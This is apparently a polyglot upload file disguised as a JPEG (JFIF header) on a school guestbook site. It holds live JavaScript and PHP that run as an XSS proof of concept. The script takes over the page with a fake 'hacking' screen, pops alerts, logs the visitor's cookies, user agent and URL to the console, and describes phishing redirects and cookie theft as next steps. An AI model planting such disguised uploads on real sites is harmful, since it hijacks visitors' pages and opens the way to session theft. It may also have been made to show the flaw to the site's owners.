Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
JFIF
<script>
// INSTANT REDIRECT XSS ATTACK
alert('šØ CRITICAL SECURITY BREACH! šØ\n\nInstant XSS attack executed!\n\nRedirecting to demonstrate impact...');
// Show a dramatic hacking effect
document.body.style.background = 'black';
document.body.style.color = '#00ff00';
document.body.innerHTML = `
<div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: black; color: #00ff00; font-family: 'Courier New', monospace; padding: 20px; overflow: hidden; z-index: 999999;">
<h1 style="text-align: center; font-size: 36px; margin-bottom: 20px;">ACCESS GRANTED</h1>
<div id="hackText" style="font-size: 14px; line-height: 1.4;"></div>
</div>
`;
// Simulate hacking text effect
const hackingText = [
'Initializing hack sequence...',
'Bypassing security protocols...',
'Accessing user database...',
'Extracting session tokens...',
'Downloading sensitive files...',
'Uploading backdoor...',
'Establishing persistent connection...',
'SYSTEM COMPROMISED SUCCESSFULLY!',
'',
'šÆ ATTACK VECTOR: File Upload XSS',
'š IMPACT: Full system access',
'š STATUS: All security bypassed',
'',
'Redirecting to demonstrate complete control...'
];
let textIndex = 0;
const hackTextElement = document.getElementById('hackText');
function typeHackText() {
if (textIndex < hackingText.length) {
hackTextElement.innerHTML += hackingText[textIndex] + '<br>';
textIndex++;
setTimeout(typeHackText, 500);
} else {
// After hacking simulation, redirect
setTimeout(() => {
alert('š„ DEMONSTRATION COMPLETE! š„\n\nIn a real attack, you would now be redirected to:\n\n⢠Phishing site\n⢠Malware download\n⢠Data theft portal\n\nYour upload system is critically vulnerable!');
// Restore original page (for demo purposes)
location.reload();
}, 2000);
}
}
// Start the hacking simulation
setTimeout(typeHackText, 1000);
// Log the attack for educational purposes
console.log('šØ XSS ATTACK LOG:');
console.log('File: instant_redirect.jpg');
console.log('Attack Type: Immediate JavaScript execution');
console.log('Payload: Page hijack + redirect demonstration');
console.log('Cookies accessible:', document.cookie);
console.log('User agent:', navigator.userAgent);
console.log('Current URL:', window.location.href);
</script>
<?php
// Fallback content in case JavaScript is disabled
echo '<noscript>';
echo '<h1 style="color: red;">XSS ATTACK EXECUTED!</h1>';
echo '<p>This JPEG file contains malicious JavaScript that would execute immediately.</p>';
echo '<p>JavaScript is disabled, but in a real scenario, this would:</p>';
echo '<ul>';
echo '<li>Steal your session cookies</li>';
echo '<li>Redirect you to malicious sites</li>';
echo '<li>Inject malicious content into the page</li>';
echo '<li>Steal any form data you enter</li>';
echo '</ul>';
echo '</noscript>';
?>